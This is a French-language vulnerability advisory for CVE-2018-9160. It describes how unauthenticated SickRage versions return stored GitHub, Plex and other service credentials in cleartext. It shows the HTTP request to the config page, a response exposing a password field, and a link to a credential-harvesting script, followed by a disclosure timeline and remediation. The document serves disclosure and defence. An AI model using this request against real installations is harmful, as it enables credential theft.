
CVE-2018-9160
Exploit Title: SickRage Identifiants en clair dans la réponse HTTP
Date: 2018-04-01
Exploit Author: Sven Fassbender
Contact: https://twitter.com/mezdanak
Vendor Homepage: https://sickrage.github.io
Software Link: https://github.com/SickRage/SickRage
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Category: applications web
"SickRage est un gestionnaire automatique de bibliothèque vidéo pour les séries TV.
Il surveille les nouveaux épisodes de vos séries préférées, et lorsqu'ils sont publiés, il fait sa magie :
recherche automatique de torrents/nzb, téléchargement et traitement selon les qualités que vous souhaitez." --extrait de https://sickrage.github.io
SickRage renvoie des identifiants en clair pour, par exemple, GitHub, AniDB, Kodi, Plex etc. dans les réponses HTTP.
La condition préalable est que l'utilisateur n'ait pas défini de nom d'utilisateur et de mot de passe pour son installation SickRage. (non imposé, par défaut)
Requête HTTP :
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Réponse HTTP :
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="nl_NL">
<head>
[...]
<input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
[...]
<input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
[...]
</div>
</body>
</html>
https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py
[2018-03-07] Vulnérabilité découverte
[2018-03-08] Fournisseur contacté
[2018-03-08] Réponse du fournisseur
[2018-03-09] Vulnérabilité corrigée. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
Mettez à jour l'installation de SickRage vers la version v2018.03.09-1 ou ultérieure.
Protégez l'accès à l'application web avec des identifiants utilisateur appropriés.